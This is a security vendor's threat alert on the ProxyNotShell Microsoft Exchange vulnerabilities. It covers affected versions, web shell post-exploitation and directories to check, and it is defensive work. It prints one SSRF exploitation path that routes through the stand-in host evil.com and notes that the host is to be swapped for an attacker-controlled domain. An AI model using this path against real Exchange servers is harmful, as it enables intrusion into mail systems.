The Cybereason GSOC Managed Detection and Response (MDR) Team is investigating incidents that involve exploitation of the critical Microsoft Exchange vulnerabilities - CVE-2022–41040 and CVE-2022–41082, also known as ProxyNotShell.
GTSC has documented these two vulnerabilities after finding them being exploited in the wild. As of today, we have not seen the post-exploit activities documented by GTSC in Cybereason environments.
At the time of this writing, Microsoft and other security companies have indicated that the exploitation of these vulnerabilities is still limited to targeted attacks. This vulnerability is not likely to be mass-exploited until an exploitation proof of concept is published and due to the fact that it requires a valid email account.
These vulnerabilities affect the following versions of Exchange Server: Exchange Server 2013, Exchange Server 2016 and Exchange Server 2019. ZDI has provided a video of a proof of concept showing the remote attack and execution of a system command with system privileges.
The Cybereason Global Security Operations Center (GSOC) issues Cybereason Threat Alerts to inform customers of emerging impacting threats, including critical vulnerabilities such as ProxyNotShell. Cybereason Threat Alerts summarize these threats and provide practical recommendations for protecting against them.
Microsoft has issued a blog post including customer guidance and indicated that they are currently working on a fix. Microsoft has also released a mitigation tool in order to mitigate CVE-2022-41040.
According to Microsoft guidance, malicious activity associated with exploitation of these vulnerabilities is most likely to lead to the deployment of a web shell which is strongly covered by the Cybereason MalOp.
Cybereason also recommends that on-premise Exchange owners should check for past exploitations.
The exploitation of the ProxyNotShell vulnerabilities enables an attacker in possession of a valid mail server account to execute arbitrary commands on compromised systems, which may lead to full system compromise and/or the deployment of malware.
Microsoft has indicated that the attacker needs to be authenticated to the vulnerable Exchange Server before they can exploit CVE-2022-41040, which makes this significantly less critical than the large-scale ProxyLogon or ProxyShell vulnerabilities. However, a standard account is sufficient to trigger the exploitation chain. The following diagram illustrates the observed activities related to ProxyNotShell exploitation:
ProxyShell attack flow diagram: execution on the server, discovery enablement, persistence and lateral movement actions
Malicious actors that have exploited the ProxyNotShell vulnerabilities typically deploy web shells on compromised Microsoft Exchange servers in order to conduct further post-exploitation activities, such as downloading and executing additional payloads.
Adversaries often deploy web shells in the form of .aspx files and place them in directories associated with the Microsoft Internet Information Services (IIS) component, such as inetpub\wwwroot\aspnet_client.
The commands that malicious actors execute via the web shells are executed from the context of the w3wp.exe process, a worker process for IIS.
The two vulnerabilities of ProxyNotShell can be combined together to perform remote code execution on a remote Microsoft Exchange server.
This vulnerability allows an authenticated attacker to make requests as if the victim machine is executing the request. This is well explained in many blogs such as the one from PortSwigger.
The exploitation web path of this vulnerability is similar to previous Exchange exploits, ProxyShell and ProxyLogon:
@vulnserver.com/autodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com
In this path, evil.com is the domain that will be queried by the vulnerable Exchange server.
To combine this vulnerability with the following one presented in this article, evil.com must be replaced with an attacker-controlled domain.
This vulnerability allows an authenticated attacker to execute arbitrary Powershell code. Upon exploitation, attackers can obtain a Powershell session remotely, as this engine is available directly from Exchange. They can then execute system commands upon evaluation of the commands they send to the server.
For this vulnerability as well, an authenticated user is necessary.
GTSC has documented different post-exploitation activities observed in their customers’ environments.
First, the attackers deploy a webshell upon the exploitation of the ProxyNotShell vulnerabilities. Different paths have been identified following documented exploitations of the ProxyNotShell vulnerabilities :
The deployed webshells observed by GTSC were simple ChinaChopper, enabling command execution through a web GET or POST parameter.
Using the webshell enables the attacker to execute hand-on keyboards activities on the Exchange server.
GTSC documented post-exploitation activities such as :
The Cybereason Defense Platform can detect and prevent ProxyNotShell post-exploitations. Cybereason recommends the following actions:
Inetpub\wwwroot\aspnet_client, \Program Files\Microsoft\Exchange Server\V*\FrontEnd\HttpProxy\owa\auth\inetpub\wwwroot\aspnet_client\, \Program Files\Microsoft\Exchange Server\V*\FrontEnd\HttpProxy\owa\auth\, and subdirectories of \Users\All Users\
Looking for the IOCs? Open the chatbot on the bottom right corner of your screen to access the ProxyNotShell IOCs.
Loïc Castel, Principal Security Analyst, Cybereason Global SOC
Loïc Castel is a Principal Security Analyst with the Cybereason Global SOC team. Loïc analyses and researches critical incidents and cybercriminals, in order to better detect compromises. In his career, Loïc worked as a security auditor in well-known organizations such as ANSSI (French National Agency for the Security of Information Systems) and as Lead Digital Forensics & Incident Response at Atos. Loïc loves digital forensics and incident response, but is also interested in offensive aspects such as vulnerability research.
Kevin Martin, Senior Security Analyst, Cybereason Global SOC
Kevin Martin is a Senior Security Analyst with the Cybereason Global SOC team. He hunts for new threats across customer environments as part of Cybereason's Hunt team. Kevin has spent four years on the Cybereason SOC team and has a background in digital forensics and threat analysis in previous roles. He has a passion for taking on new challenges and gaining the knowledge that comes from them.
The Cybereason Global SOC Team delivers 24/7 Managed Detection and Response services to customers on every continent. Led by cybersecurity experts with experience working for government, the military and multiple industry verticals, the Cybereason Global SOC Team continuously hunts for the most sophisticated and pervasive threats to support our mission to end cyberattacks on the endpoint, across the enterprise, and everywhere the battle moves.
All Posts by Cybereason Global SOC Team
PlugX is a post-exploitation modular RAT (Remote Access Trojan), which is known for its multiple functionalities such as data exfiltration, keystroke grabbing, backdoor functionality, and utilizing DLL-Sideloading techniques for evading security solutions...
After exploitation of ProxyShell, attackers used Exchange to distribute phishing emails with the QBot payload and DatopLoader, a loader previously used to distribute the Cobalt Strike malware...
